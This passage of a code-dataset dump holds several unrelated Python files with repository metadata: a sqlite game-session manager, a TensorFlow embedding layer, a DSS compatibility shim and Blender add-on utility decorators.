select max_circle, min_circle, num_circles, num_guesses, difficulty from rules where game_id = ?
''', [game])
start_size, end_size, num_circles, num_guesses, difficulty = cur.fetchone()
return {
'start_size': start_size,
'end_size': end_size,
'num_circles': num_circles,
'num_guesses': num_guesses,
'difficulty': difficulty
}
def resume_session(self, session):
cur = self.db.cursor()
cur.execute(
'select game.game_id, state, position, display_name from session left join game on session.game_id = game.game_id where session_id = ?', [session])
return cur.fetchone()
def get_host_session(self, session):
cur = self.db.cursor()
cur.execute('''
select game.game_id, host.session_id from
session as guest
left join game on guest.game_id = game.game_id
left join session as host on host.game_id = game.game_id
where guest.session_id = ? and host.position = 0
''', [session])
return cur.fetchone()
def get_guest_session(self, session):
cur = self.db.cursor()
cur.execute('''
select game.game_id, guest.session_id from
session as host
left join game on host.game_id = game.game_id
left join session as guest on guest.game_id = game.game_id
where host.session_id = ? and guest.position = 1
''', [session])
return cur.fetchone()
def get_session_info(self, session):
cur = self.db.cursor()
cur.execute(
'select game.game_id, game.state, session.position from session left join game on session.game_id = game.game_id where session_id = ?', [session])
return cur.fetchone()
def get_game_sessions(self, game):
cur = self.db.cursor()
cur.execute(
'select session_id from session where game_id = ? order by position asc', [game])
return [sid for (sid,) in cur.fetchall()]
def set_state(self, game, state):
cur = self.db.cursor()
cur.execute('update game set state = ? where game_id = ?',
[state, game])
self.db.commit()
def set_challenge(self, game, lat, lon, pano, heading, pitch, zoom, guesses, radius):
cur = self.db.cursor()
cur.execute('insert into challenge (game_id, lat, lon, pano, heading, pitch, zoom, guesses, radius) values (?, ?, ?, ?, ?, ?, ?, ?, ?)', [
game, lat, lon, pano, heading, pitch, zoom, guesses, radius])
self.db.commit()
def update_challenge(self, game, guesses, radius):
cur = self.db.cursor()
cur.execute(
'select challenge_id from challenge where game_id = ? order by challenge_id desc', [game])
challenge, = cur.fetchone()
cur.execute('update challenge set guesses = ?, radius = ? where challenge_id = ?', [
guesses, radius, challenge])
self.db.commit()
def get_challenge(self, game):
cur = self.db.cursor()
cur.execute(
'select lat, lon, pano, heading, pitch, zoom, guesses, radius from challenge where game_id = ? order by challenge_id desc', [game])
return cur.fetchone()
def set_guess(self, game, lat, lon, radius, good):
cur = self.db.cursor()
cur.execute(
'select challenge_id from challenge where game_id = ? order by challenge_id desc', [game])
challenge, = cur.fetchone()
cur.execute('insert into guess (challenge_id, lat, lon, radius, good) values (?, ?, ?, ?, ?)', [
challenge, lat, lon, radius, good])
self.db.commit()
def get_guesses(self, game):
cur = self.db.cursor()
cur.execute(
'select challenge_id from challenge where game_id = ? order by challenge_id desc', [game])
challenge, = cur.fetchone()
cur.execute(
'select lat, lon, radius, good from guess where challenge_id = ? order by guess_id asc', [challenge])
res = []
for lat, lon, radius, good in cur.fetchall():
res.append({
'lat': lat,
'lon': lon,
'radius': radius,
'good': good
})
return res
def close(self):
self.db.close()
self.db = None
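# Hedged usage sketch (database path and player names are illustrative), using only the API above:
#   mgr = state_mgr('/tmp/geocircles.db')
#   game_id, host_sid = mgr.create_game('host player')
#   guest_sid = mgr.join_game(game_id, 'guest player')   # moves the game to WAITING_FOR_HOST
#   mgr.set_state(game_id, next_state(game_state.WAITING_FOR_HOST.value))
#   mgr.close()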
| import sqlite3
from enum import Enum
import random
__all__ = ['state_mgr', 'game_state', 'next_state']
class game_state (Enum):
NEW_GAME = 0
WAITING_FOR_HOST = 1
HOST_CHOOSING = 2
GUEST_GUESSING = 3
GUEST_CHOOSING = 4
HOST_GUESSING = 5
def next_state(s):
if s == game_state.WAITING_FOR_HOST.value:
return game_state.GUEST_CHOOSING.value
elif s == game_state.GUEST_CHOOSING.value:
return game_state.HOST_GUESSING.value
elif s == game_state.HOST_CHOOSING.value:
return game_state.GUEST_GUESSING.value
elif s == game_state.GUEST_GUESSING.value:
return game_state.GUEST_CHOOSING.value
elif s == game_state.HOST_GUESSING.value:
return game_state.HOST_CHOOSING.value
class state_mgr (object):
def __init__(self, path):
self.db = sqlite3.connect(path)
cur = self.db.cursor()
cur.execute('''
create table if not exists game (
game_id integer primary key,
state integer default {:d}
)
'''.format(game_state.NEW_GAME.value))
cur.execute('''
create table if not exists session (
session_id integer primary key,
game_id integer not null references game (game_id),
position integer not null,
display_name text not null
)
''')
cur.execute('''
create table if not exists challenge (
challenge_id integer primary key autoincrement,
game_id integer not null references game (game_id),
lat real not null,
lon real not null,
pano text not null,
heading real not null,
pitch real not null,
zoom real not null,
guesses int not null,
radius int not null
)
''')
cur.execute('''
create table if not exists guess (
guess_id integer primary key autoincrement,
challenge_id integer not null references challenge (challenge_id),
lat real not null,
lon real not null,
radius real not null,
good integer not null
)
''')
cur.execute('''
create table if not exists rules (
game_id integer primary key not null references game (game_id),
max_circle integer not null,
min_circle integer not null,
num_circles integer not null,
num_guesses integer not null,
difficulty text not null
)
''')
self.db.commit()
def create_game(self, display_name):
game = random.getrandbits(16)
session = random.getrandbits(32)
cur = self.db.cursor()
cur.execute('insert into game (game_id) values (?)', [game])
cur.execute('insert into session (session_id, game_id, position, display_name) values (?, ?, ?, ?)', [
session, game, 0, display_name])
self.db.commit()
return game, session
def join_game(self, game, display_name):
session = random.getrandbits(32)
cur = self.db.cursor()
cur.execute('insert into session (session_id, game_id, position, display_name) values (?, ?, ?, ?)', [
session, game, 1, display_name])
cur.execute('update game set state = ? where game_id = ?',
[game_state.WAITING_FOR_HOST.value, game])
self.db.commit()
return session
def set_rules(self, game, rules):
cur = self.db.cursor()
cur.execute('''
insert into rules (game_id, max_circle, min_circle, num_circles, num_guesses, difficulty)
values (?, ?, ?, ?, ?, ?)
''', [game, rules['start_size'], rules['end_size'], rules['num_circles'], rules['num_guesses'], rules['difficulty']])
self.db.commit()
def get_rules(self, game):
cur = self.db.cursor()
cur.execute('''
select max_circle, min_circle, num_circles, num_guesses, difficulty from rules where game_id = ?
''', [game])
start_size, end_size, num_circles, num_guesses, difficulty = cur.fetchone()
return {
'start_size': start_size,
'end_size': end_size,
'num_circles': num_circles,
'num_guesses': num_guesses,
'difficulty': difficulty
}
def resume_session(self, session):
cur = self.db.cursor()
cur.execute(
'select game.game_id, state, position, display_name from session left join game on session.game_id = game.game_id where session_id = ?', [session])
return cur.fetchone()
def get_host_session(self, session):
cur = self.db.cursor()
cur.execute('''
select game.game_id, host.session_id from
session as guest
left join game on guest.game_id = game.game_id
left join session as host on host.game_id = game.game_id
where guest.session_id = ? and host.position = 0
''', [session])
return cur.fetchone()
def get_guest_session(self, session):
cur = self.db.cursor()
cur.execute('''
select game.game_id, guest.session_id from
session as host
left join game on host.game_id = game.game_id
left join session as guest on guest.game_id = game.game_id
where host.session_id = ? and guest.position = 1
''', [session])
return cur.fetchone()
def get_session_info(self, session):
cur = self.db.cursor()
cur.execute(
'select game.game_id, game.state, session.position from session left join game on session.game_id = game.game_id where session_id = ?', [session])
return cur.fetchone()
def get_game_sessions(self, game):
cur = self.db.cursor()
cur.execute(
'select session_id from session where game_id = ? order by position asc', [game])
return [sid for (sid,) in cur.fetchall()]
def set_state(self, game, state):
cur = self.db.cursor()
cur.execute('update game set state = ? where game_id = ?',
[state, game])
self.db.commit()
def set_challenge(self, game, lat, lon, pano, heading, pitch, zoom, guesses, radius):
cur = self.db.cursor()
cur.execute('insert into challenge (game_id, lat, lon, pano, heading, pitch, zoom, guesses, radius) values (?, ?, ?, ?, ?, ?, ?, ?, ?)', [
game, lat, lon, pano, heading, pitch, zoom, guesses, radius])
self.db.commit()
def update_challenge(self, game, guesses, radius):
cur = self.db.cursor()
cur.execute(
'select challenge_id from challenge where game_id = ? order by challenge_id desc', [game])
challenge, = cur.fetchone()
cur.execute('update challenge set guesses = ?, radius = ? where challenge_id = ?', [
guesses, radius, challenge])
self.db.commit()
def get_challenge(self, game):
cur = self.db.cursor()
cur.execute(
'select lat, lon, pano, heading, pitch, zoom, guesses, radius from challenge where game_id = ? order by challenge_id desc', [game])
return cur.fetchone()
def set_guess(self, game, lat, lon, radius, good):
cur = self.db.cursor()
cur.execute(
'select challenge_id from challenge where game_id = ? order by challenge_id desc', [game])
challenge, = cur.fetchone()
cur.execute('insert into guess (challenge_id, lat, lon, radius, good) values (?, ?, ?, ?, ?)', [
challenge, lat, lon, radius, good])
self.db.commit()
def get_guesses(self, game):
cur = self.db.cursor()
cur.execute(
'select challenge_id from challenge where game_id = ? order by challenge_id desc', [game])
challenge, = cur.fetchone()
cur.execute(
'select lat, lon, radius, good from guess where challenge_id = ? order by guess_id asc', [challenge])
res = []
for lat, lon, radius, good in cur.fetchall():
res.append({
'lat': lat,
'lon': lon,
'radius': radius,
'good': good
})
return res
def close(self):
self.db.close()
self.db = None | en | 0.619007 | create table if not exists game ( game_id integer primary key, state integer default {:d} ) create table if not exists session ( session_id integer primary key, game_id integer not null references game (game_id), position integer not null, display_name text not null ) create table if not exists challenge ( challenge_id integer primary key autoincrement, game_id integer not null references game (game_id), lat real not null, lon real not null, pano text not null, heading real not null, pitch real not null, zoom real not null, guesses int not null, radius int not null ) create table if not exists guess ( guess_id integer primary key autoincrement, challenge_id integer not null references challenge (challenge_id), lat real not null, lon real not null, radius real not null, good integer not null ) create table if not exists rules ( game_id integer primary key not null references game (game_id), max_circle integer not null, min_circle integer not null, num_circles integer not null, num_guesses integer not null, difficulty text not null ) insert into rules (game_id, max_circle, min_circle, num_circles, num_guesses, difficulty) values (?, ?, ?, ?, ?, ?) select max_circle, min_circle, num_circles, num_guesses, difficulty from rules where game_id = ? select game.game_id, host.session_id from session as guest left join game on guest.game_id = game.game_id left join session as host on host.game_id = game.game_id where guest.session_id = ? and host.position = 0 select game.game_id, guest.session_id from session as host left join game on host.game_id = game.game_id left join session as guest on guest.game_id = game.game_id where host.session_id = ? and guest.position = 1 | 3.070557 | 3 |
tests/unit/providers/callables/__init__.py | YelloFam/python-dependency-injector | 0 | 10340 | <filename>tests/unit/providers/callables/__init__.py<gh_stars>0
"""Tests for callables."""
| <filename>tests/unit/providers/callables/__init__.py<gh_stars>0
"""Tests for callables."""
| en | 0.836076 | Tests for callables. | 1.311692 | 1 |
dss/dss_capi_gr/__init__.py | dss-extensions/dss_python | 24 | 10341 | <gh_stars>10-100
'''
A compatibility layer for DSS C-API that mimics the official OpenDSS COM interface.
Copyright (c) 2016-2019 <NAME>
'''
from __future__ import absolute_import
from .IDSS import IDSS
| '''
A compatibility layer for DSS C-API that mimics the official OpenDSS COM interface.
Copyright (c) 2016-2019 <NAME>
'''
from __future__ import absolute_import
from .IDSS import IDSS | en | 0.681156 | A compatibility layer for DSS C-API that mimics the official OpenDSS COM interface. Copyright (c) 2016-2019 <NAME> | 0.853135 | 1 |
museflow/components/embedding_layer.py | BILLXZY1215/museflow | 0 | 10342 | from .component import Component, using_scope
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
class EmbeddingLayer(Component):
def __init__(self, input_size, output_size, name='embedding'):
Component.__init__(self, name=name)
self.input_size = input_size
self.output_size = output_size
with self.use_scope():
self.embedding_matrix = tf.get_variable(
'embedding_matrix', shape=[self.input_size, self.output_size])
self._built = True
@using_scope
def embed(self, x):
return tf.nn.embedding_lookup(self.embedding_matrix, x)
def __call__(self, inputs):
return self.embed(inputs)
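# Hedged usage sketch (graph-mode TF1, matching the compat.v1 setup above; sizes are illustrative):
#   layer = EmbeddingLayer(input_size=1000, output_size=64)
#   token_ids = tf.placeholder(tf.int32, shape=[None, None])  # [batch, time]
#   embedded = layer(token_ids)                                # -> [batch, time, 64]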
| from .component import Component, using_scope
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
class EmbeddingLayer(Component):
def __init__(self, input_size, output_size, name='embedding'):
Component.__init__(self, name=name)
self.input_size = input_size
self.output_size = output_size
with self.use_scope():
self.embedding_matrix = tf.get_variable(
'embedding_matrix', shape=[self.input_size, self.output_size])
self._built = True
@using_scope
def embed(self, x):
return tf.nn.embedding_lookup(self.embedding_matrix, x)
def __call__(self, inputs):
return self.embed(inputs)
| none | 1 | 2.671676 | 3 |
|
hydrocarbon_problem/env/__init__.py | lollcat/Aspen-RL | 1 | 10343 | from hydrocarbon_problem.env.types_ import Observation, Done, Stream, Column | from hydrocarbon_problem.env.types_ import Observation, Done, Stream, Column | none | 1 | 1.01272 | 1 |
|
addon_common/common/decorators.py | Unnoen/retopoflow | 1 | 10344 | '''
Copyright (C) 2021 CG Cookie
http://cgcookie.com
<EMAIL>
Created by <NAME>, <NAME>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import os
import re
import json
import time
import inspect
from functools import wraps
import bpy
debug_run_test_calls = False
def debug_test_call(*args, **kwargs):
def wrapper(fn):
if debug_run_test_calls:
ret = str(fn(*args,*kwargs))
print('TEST: %s()' % fn.__name__)
if args:
print(' arg:', args)
if kwargs:
print(' kwa:', kwargs)
print(' ret:', ret)
return fn
return wrapper
def stats_wrapper(fn):
return fn  # stats collection is currently disabled by this early return; the instrumentation below is unreachable but kept for re-enabling
if not hasattr(stats_report, 'stats'):
stats_report.stats = dict()
frame = inspect.currentframe().f_back
f_locals = frame.f_locals
filename = os.path.basename(frame.f_code.co_filename)
clsname = f_locals['__qualname__'] if '__qualname__' in f_locals else ''
linenum = frame.f_lineno
fnname = fn.__name__
key = '%s%s (%s:%d)' % (
clsname + ('.' if clsname else ''),
fnname, filename, linenum
)
stats = stats_report.stats
stats[key] = {
'filename': filename,
'clsname': clsname,
'linenum': linenum,
'fileline': '%s:%d' % (filename, linenum),
'fnname': fnname,
'count': 0,
'total time': 0,
'average time': 0,
}
def wrapped(*args, **kwargs):
time_beg = time.time()
ret = fn(*args, **kwargs)
time_end = time.time()
time_delta = time_end - time_beg
d = stats[key]
d['count'] += 1
d['total time'] += time_delta
d['average time'] = d['total time'] / d['count']
return ret
return wrapped
def stats_report():
return  # reporting is currently disabled by this early return; the table-printing code below is kept for re-enabling
stats = stats_report.stats if hasattr(stats_report, 'stats') else dict()
l = max(len(k) for k in stats)
def fmt(s):
return s + ' ' * (l - len(s))
print()
print('Call Statistics Report')
cols = [
('class', 'clsname', '%s'),
('func', 'fnname', '%s'),
('location', 'fileline', '%s'),
# ('line','linenum','% 10d'),
('count', 'count', '% 8d'),
('total (sec)', 'total time', '% 10.4f'),
('avg (sec)', 'average time', '% 10.6f'),
]
data = [stats[k] for k in sorted(stats)]
data = [[h] + [f % row[c] for row in data] for (h, c, f) in cols]
colwidths = [max(len(d) for d in col) for col in data]
totwidth = sum(colwidths) + len(colwidths) - 1
def rpad(s, l):
return '%s%s' % (s, ' ' * (l - len(s)))
def printrow(i_row):
row = [col[i_row] for col in data]
print(' '.join(rpad(d, w) for (d, w) in zip(row, colwidths)))
printrow(0)
print('-' * totwidth)
for i in range(1, len(data[0])):
printrow(i)
def add_cache(attr, default):
def wrapper(fn):
setattr(fn, attr, default)
return fn
return wrapper
class LimitRecursion:
def __init__(self, count, def_ret):
self.count = count
self.def_ret = def_ret
self.calls = 0
def __call__(self, fn):
def wrapped(*args, **kwargs):
ret = self.def_ret
if self.calls < self.count:
try:
self.calls += 1
ret = fn(*args, **kwargs)
finally:
self.calls -= 1
return ret
return wrapped
@add_cache('data', {'nested':0, 'last':None})
def timed_call(label):
def wrapper(fn):
def wrapped(*args, **kwargs):
data = timed_call.data
if data['last']: print(data['last'])
data['last'] = f'''{" " * data['nested']}Timing {label}'''
data['nested'] += 1
time_beg = time.time()
ret = fn(*args, **kwargs)
time_end = time.time()
time_delta = time_end - time_beg
if data['last']:
print(f'''{data['last']}: {time_delta:0.4f}s''')
data['last'] = None
else:
print(f'''{" " * data['nested']}{time_delta:0.4f}s''')
data['nested'] -= 1
return ret
return wrapped
return wrapper
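# Illustrative: @timed_call('mesh rebuild') on a function prints nested timing lines
# such as 'Timing mesh rebuild: 0.0123s' each time the wrapped function runs.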
# corrected bug in previous version of blender_version fn wrapper
# https://github.com/CGCookie/retopoflow/commit/135746c7b4ee0052ad0c1842084b9ab983726b33#diff-d4260a97dcac93f76328dfaeb5c87688
def blender_version_wrapper(op, ver):
self = blender_version_wrapper
if not hasattr(self, 'fns'):
major, minor, rev = bpy.app.version
self.blenderver = '%d.%02d' % (major, minor)
self.fns = fns = {}
self.ops = {
'<': lambda v: self.blenderver < v,
'>': lambda v: self.blenderver > v,
'<=': lambda v: self.blenderver <= v,
'==': lambda v: self.blenderver == v,
'>=': lambda v: self.blenderver >= v,
'!=': lambda v: self.blenderver != v,
}
update_fn = self.ops[op](ver)
def wrapit(fn):
nonlocal self, update_fn
fn_name = fn.__name__
fns = self.fns
error_msg = "Could not find appropriate function named %s for version Blender %s" % (fn_name, self.blenderver)
if update_fn: fns[fn_name] = fn
def callit(*args, **kwargs):
nonlocal fns, fn_name, error_msg
fn = fns.get(fn_name, None)
assert fn, error_msg
ret = fn(*args, **kwargs)
return ret
return callit
return wrapit
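# Illustrative dispatch across the well-known Blender 2.80 API split (hedged sketch):
#   @blender_version_wrapper('<', '2.80')
#   def get_active(context): return context.scene.objects.active
#   @blender_version_wrapper('>=', '2.80')
#   def get_active(context): return context.view_layer.objects.active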
def only_in_blender_version(*args, ignore_others=False, ignore_return=None):
self = only_in_blender_version
if not hasattr(self, 'fns'):
major, minor, rev = bpy.app.version
self.blenderver = '%d.%02d' % (major, minor)
self.fns = {}
self.ignores = {}
self.ops = {
'<': lambda v: self.blenderver < v,
'>': lambda v: self.blenderver > v,
'<=': lambda v: self.blenderver <= v,
'==': lambda v: self.blenderver == v,
'>=': lambda v: self.blenderver >= v,
'!=': lambda v: self.blenderver != v,
}
self.re_blender_version = re.compile(r'^(?P<comparison><|<=|==|!=|>=|>) *(?P<version>\d\.\d\d)$')
matches = [self.re_blender_version.match(arg) for arg in args]
assert all(match is not None for match in matches), f'At least one arg did not match version comparison: {args}'
results = [self.ops[match.group('comparison')](match.group('version')) for match in matches]
version_matches = all(results)
def wrapit(fn):
fn_name = fn.__name__
if version_matches:
assert fn_name not in self.fns, f'Multiple functions {fn_name} match the Blender version {self.blenderver}'
self.fns[fn_name] = fn
if ignore_others and fn_name not in self.ignores:
self.ignores[fn_name] = ignore_return
@wraps(fn)
def callit(*args, **kwargs):
fn = self.fns.get(fn_name, None)
if fn_name not in self.ignores:
assert fn, f'Could not find appropriate function named {fn_name} for version Blender version {self.blenderver}'
elif fn is None:
return self.ignores[fn_name]
return fn(*args, **kwargs)
return callit
return wrapit
def warn_once(warning):
def wrapper(fn):
nonlocal warning
@wraps(fn)
def wrapped(*args, **kwargs):
nonlocal warning
if warning:
print(warning)
warning = None
return fn(*args, **kwargs)
return wrapped
return wrapper
class PersistentOptions:
class WrappedDict:
def __init__(self, cls, filename, version, defaults, update_external):
self._dirty = False
self._last_save = time.time()
self._write_delay = 2.0
self._defaults = defaults
self._update_external = update_external
self._defaults['persistent options version'] = version
self._dict = {}
if filename:
src = inspect.getsourcefile(cls)
path = os.path.split(os.path.abspath(src))[0]
self._fndb = os.path.join(path, filename)
else:
self._fndb = None
self.read()
if self._dict.get('persistent options version', None) != version:
self.reset()
self.update_external()
def update_external(self):
upd = self._update_external
if upd:
upd()
def dirty(self):
self._dirty = True
self.update_external()
def clean(self, force=False):
if not force:
if not self._dirty:
return
if time.time() < self._last_save + self._write_delay:
return
if self._fndb:
json.dump(self._dict, open(self._fndb, 'wt'), indent=2, sort_keys=True)
self._dirty = False
self._last_save = time.time()
def read(self):
self._dict = {}
if self._fndb and os.path.exists(self._fndb):
try:
self._dict = json.load(open(self._fndb, 'rt'))
except Exception as e:
print('Exception caught while trying to read options from "%s"' % self._fndb)
print(str(e))
for k in set(self._dict.keys()) - set(self._defaults.keys()):
print('Deleting extraneous key "%s" from options' % k)
del self._dict[k]
self.update_external()
self._dirty = False
def keys(self):
return self._defaults.keys()
def reset(self):
keys = list(self._dict.keys())
for k in keys:
del self._dict[k]
self._dict['persistent options version'] = self['persistent options version']
self.dirty()
self.clean()
def __getitem__(self, key):
return self._dict[key] if key in self._dict else self._defaults[key]
def __setitem__(self, key, val):
assert key in self._defaults, 'Attempting to write "%s":"%s" to options, but key does not exist in defaults' % (str(key), str(val))
if self[key] == val: return
self._dict[key] = val
self.dirty()
self.clean()
def gettersetter(self, key, fn_get_wrap=None, fn_set_wrap=None):
if not fn_get_wrap: fn_get_wrap = lambda v: v
if not fn_set_wrap: fn_set_wrap = lambda v: v
oself = self
class GetSet:
def get(self):
return fn_get_wrap(oself[key])
def set(self, v):
v = fn_set_wrap(v)
if oself[key] != v:
oself[key] = v
return GetSet()
def __init__(self, filename=None, version=None):
self._filename = filename
self._version = version
self._db = None
def __call__(self, cls):
upd = getattr(cls, 'update', None)
if upd:
u = upd
def wrap():
def upd_wrap(*args, **kwargs):
u(None)
return upd_wrap
upd = wrap()
self._db = PersistentOptions.WrappedDict(cls, self._filename, self._version, cls.defaults, upd)
db = self._db
class WrappedClass:
def __init__(self, *args, **kwargs):
self._db = db
self._def = cls.defaults
def __getitem__(self, key):
return self._db[key]
def __setitem__(self, key, val):
self._db[key] = val
def keys(self):
return self._db.keys()
def reset(self):
self._db.reset()
def clean(self):
self._db.clean()
def gettersetter(self, key, fn_get_wrap=None, fn_set_wrap=None):
return self._db.gettersetter(key, fn_get_wrap=fn_get_wrap, fn_set_wrap=fn_set_wrap)
return WrappedClass
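# Hedged usage sketch for PersistentOptions (filename and keys are illustrative):
#   @PersistentOptions(filename='options.json', version=1)
#   class Options:
#       defaults = {'theme': 'dark', 'scale': 1.0}
#   opts = Options()
#   opts['scale'] = 1.5   # persisted (debounced by _write_delay) to options.json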
| '''
Copyright (C) 2021 CG Cookie
http://cgcookie.com
<EMAIL>
Created by <NAME>, <NAME>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import os
import re
import json
import time
import inspect
from functools import wraps
import bpy
debug_run_test_calls = False
def debug_test_call(*args, **kwargs):
def wrapper(fn):
if debug_run_test_calls:
ret = str(fn(*args,*kwargs))
print('TEST: %s()' % fn.__name__)
if args:
print(' arg:', args)
if kwargs:
print(' kwa:', kwargs)
print(' ret:', ret)
return fn
return wrapper
def stats_wrapper(fn):
return fn  # stats collection is currently disabled by this early return; the instrumentation below is unreachable but kept for re-enabling
if not hasattr(stats_report, 'stats'):
stats_report.stats = dict()
frame = inspect.currentframe().f_back
f_locals = frame.f_locals
filename = os.path.basename(frame.f_code.co_filename)
clsname = f_locals['__qualname__'] if '__qualname__' in f_locals else ''
linenum = frame.f_lineno
fnname = fn.__name__
key = '%s%s (%s:%d)' % (
clsname + ('.' if clsname else ''),
fnname, filename, linenum
)
stats = stats_report.stats
stats[key] = {
'filename': filename,
'clsname': clsname,
'linenum': linenum,
'fileline': '%s:%d' % (filename, linenum),
'fnname': fnname,
'count': 0,
'total time': 0,
'average time': 0,
}
def wrapped(*args, **kwargs):
time_beg = time.time()
ret = fn(*args, **kwargs)
time_end = time.time()
time_delta = time_end - time_beg
d = stats[key]
d['count'] += 1
d['total time'] += time_delta
d['average time'] = d['total time'] / d['count']
return ret
return wrapped
def stats_report():
return  # reporting is currently disabled by this early return; the table-printing code below is kept for re-enabling
stats = stats_report.stats if hasattr(stats_report, 'stats') else dict()
l = max(len(k) for k in stats)
def fmt(s):
return s + ' ' * (l - len(s))
print()
print('Call Statistics Report')
cols = [
('class', 'clsname', '%s'),
('func', 'fnname', '%s'),
('location', 'fileline', '%s'),
# ('line','linenum','% 10d'),
('count', 'count', '% 8d'),
('total (sec)', 'total time', '% 10.4f'),
('avg (sec)', 'average time', '% 10.6f'),
]
data = [stats[k] for k in sorted(stats)]
data = [[h] + [f % row[c] for row in data] for (h, c, f) in cols]
colwidths = [max(len(d) for d in col) for col in data]
totwidth = sum(colwidths) + len(colwidths) - 1
def rpad(s, l):
return '%s%s' % (s, ' ' * (l - len(s)))
def printrow(i_row):
row = [col[i_row] for col in data]
print(' '.join(rpad(d, w) for (d, w) in zip(row, colwidths)))
printrow(0)
print('-' * totwidth)
for i in range(1, len(data[0])):
printrow(i)
def add_cache(attr, default):
def wrapper(fn):
setattr(fn, attr, default)
return fn
return wrapper
class LimitRecursion:
def __init__(self, count, def_ret):
self.count = count
self.def_ret = def_ret
self.calls = 0
def __call__(self, fn):
def wrapped(*args, **kwargs):
ret = self.def_ret
if self.calls < self.count:
try:
self.calls += 1
ret = fn(*args, **kwargs)
finally:
self.calls -= 1
return ret
return wrapped
@add_cache('data', {'nested':0, 'last':None})
def timed_call(label):
def wrapper(fn):
def wrapped(*args, **kwargs):
data = timed_call.data
if data['last']: print(data['last'])
data['last'] = f'''{" " * data['nested']}Timing {label}'''
data['nested'] += 1
time_beg = time.time()
ret = fn(*args, **kwargs)
time_end = time.time()
time_delta = time_end - time_beg
if data['last']:
print(f'''{data['last']}: {time_delta:0.4f}s''')
data['last'] = None
else:
print(f'''{" " * data['nested']}{time_delta:0.4f}s''')
data['nested'] -= 1
return ret
return wrapped
return wrapper
# corrected bug in previous version of blender_version fn wrapper
# https://github.com/CGCookie/retopoflow/commit/135746c7b4ee0052ad0c1842084b9ab983726b33#diff-d4260a97dcac93f76328dfaeb5c87688
def blender_version_wrapper(op, ver):
self = blender_version_wrapper
if not hasattr(self, 'fns'):
major, minor, rev = bpy.app.version
self.blenderver = '%d.%02d' % (major, minor)
self.fns = fns = {}
self.ops = {
'<': lambda v: self.blenderver < v,
'>': lambda v: self.blenderver > v,
'<=': lambda v: self.blenderver <= v,
'==': lambda v: self.blenderver == v,
'>=': lambda v: self.blenderver >= v,
'!=': lambda v: self.blenderver != v,
}
update_fn = self.ops[op](ver)
def wrapit(fn):
nonlocal self, update_fn
fn_name = fn.__name__
fns = self.fns
error_msg = "Could not find appropriate function named %s for version Blender %s" % (fn_name, self.blenderver)
if update_fn: fns[fn_name] = fn
def callit(*args, **kwargs):
nonlocal fns, fn_name, error_msg
fn = fns.get(fn_name, None)
assert fn, error_msg
ret = fn(*args, **kwargs)
return ret
return callit
return wrapit
def only_in_blender_version(*args, ignore_others=False, ignore_return=None):
self = only_in_blender_version
if not hasattr(self, 'fns'):
major, minor, rev = bpy.app.version
self.blenderver = '%d.%02d' % (major, minor)
self.fns = {}
self.ignores = {}
self.ops = {
'<': lambda v: self.blenderver < v,
'>': lambda v: self.blenderver > v,
'<=': lambda v: self.blenderver <= v,
'==': lambda v: self.blenderver == v,
'>=': lambda v: self.blenderver >= v,
'!=': lambda v: self.blenderver != v,
}
self.re_blender_version = re.compile(r'^(?P<comparison><|<=|==|!=|>=|>) *(?P<version>\d\.\d\d)$')
matches = [self.re_blender_version.match(arg) for arg in args]
assert all(match is not None for match in matches), f'At least one arg did not match version comparison: {args}'
results = [self.ops[match.group('comparison')](match.group('version')) for match in matches]
version_matches = all(results)
def wrapit(fn):
fn_name = fn.__name__
if version_matches:
assert fn_name not in self.fns, f'Multiple functions {fn_name} match the Blender version {self.blenderver}'
self.fns[fn_name] = fn
if ignore_others and fn_name not in self.ignores:
self.ignores[fn_name] = ignore_return
@wraps(fn)
def callit(*args, **kwargs):
fn = self.fns.get(fn_name, None)
if fn_name not in self.ignores:
assert fn, f'Could not find appropriate function named {fn_name} for version Blender version {self.blenderver}'
elif fn is None:
return self.ignores[fn_name]
return fn(*args, **kwargs)
return callit
return wrapit
def warn_once(warning):
def wrapper(fn):
nonlocal warning
@wraps(fn)
def wrapped(*args, **kwargs):
nonlocal warning
if warning:
print(warning)
warning = None
return fn(*args, **kwargs)
return wrapped
return wrapper
class PersistentOptions:
class WrappedDict:
def __init__(self, cls, filename, version, defaults, update_external):
self._dirty = False
self._last_save = time.time()
self._write_delay = 2.0
self._defaults = defaults
self._update_external = update_external
self._defaults['persistent options version'] = version
self._dict = {}
if filename:
src = inspect.getsourcefile(cls)
path = os.path.split(os.path.abspath(src))[0]
self._fndb = os.path.join(path, filename)
else:
self._fndb = None
self.read()
if self._dict.get('persistent options version', None) != version:
self.reset()
self.update_external()
def update_external(self):
upd = self._update_external
if upd:
upd()
def dirty(self):
self._dirty = True
self.update_external()
def clean(self, force=False):
if not force:
if not self._dirty:
return
if time.time() < self._last_save + self._write_delay:
return
if self._fndb:
json.dump(self._dict, open(self._fndb, 'wt'), indent=2, sort_keys=True)
self._dirty = False
self._last_save = time.time()
def read(self):
self._dict = {}
if self._fndb and os.path.exists(self._fndb):
try:
self._dict = json.load(open(self._fndb, 'rt'))
except Exception as e:
print('Exception caught while trying to read options from "%s"' % self._fndb)
print(str(e))
for k in set(self._dict.keys()) - set(self._defaults.keys()):
print('Deleting extraneous key "%s" from options' % k)
del self._dict[k]
self.update_external()
self._dirty = False
def keys(self):
return self._defaults.keys()
def reset(self):
keys = list(self._dict.keys())
for k in keys:
del self._dict[k]
self._dict['persistent options version'] = self['persistent options version']
self.dirty()
self.clean()
def __getitem__(self, key):
return self._dict[key] if key in self._dict else self._defaults[key]
def __setitem__(self, key, val):
assert key in self._defaults, 'Attempting to write "%s":"%s" to options, but key does not exist in defaults' % (str(key), str(val))
if self[key] == val: return
self._dict[key] = val
self.dirty()
self.clean()
def gettersetter(self, key, fn_get_wrap=None, fn_set_wrap=None):
if not fn_get_wrap: fn_get_wrap = lambda v: v
